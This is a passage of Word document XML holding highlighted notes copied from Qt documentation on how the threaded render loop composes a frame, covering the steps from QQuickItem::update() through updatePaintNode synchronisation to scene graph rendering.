        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00296651" w:rsidRPr="00296651" w:rsidRDefault="001113FB" w:rsidP="004F7B6E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The following is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simple outline</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of how a </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>frame</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gets composed with the threaded render</w:t>
      </w:r>
      <w:r w:rsidR="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loop.</w:t>
      </w:r>
      <w:r w:rsidR="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="004F7B6E" w:rsidRDefault="001113FB" w:rsidP="004F7B6E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001113FB">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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-threaded.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1042" type="#_x0000_t75" alt="" style="width:482.1pt;height:475.8pt">
            <v:imagedata r:id="rId2008" r:href="rId2009"/>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Pr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>change occurs</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the QML scene, causing</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickItem::update()</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to be called. This can be the result of for instance an animation or user input. An event is posted to the render thread to initiate a new frame.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>render thread prepares to draw</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a new frame and makes the OpenGL context current and initiates a block on the GUI thread.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>While the render thread is preparing the new frame, the GUI thread calls</w:t>
      </w:r>
      <w:r w:rsidR="00296651">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2010" w:anchor="updatePolish" w:history="1">
        <w:r w:rsidRPr="00296651">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePolish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to do </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>final touch-up of items before they are rendered</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GUI thread is blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00296651">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2011" w:anchor="beforeSynchronizing" w:history="1">
        <w:r w:rsidRPr="0011590B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::beforeSynchronizing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> signal is emitted. Applications can make direct connections (using</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2012" w:anchor="ConnectionType-enum" w:history="1">
        <w:r w:rsidRPr="0011590B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt::DirectConnection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) to this signal to do any preparation required before calls to</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2013" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Synchronization of the QML state into the scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This is done by calling the</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2014" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="00643457">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) function on </w:t>
      </w:r>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">all items that have changed since </w:t>
      </w:r>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>the previous frame</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is the only time the QML items and the nodes in the scene graph interact</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GUI thread block is released</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scene graph is rendered</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
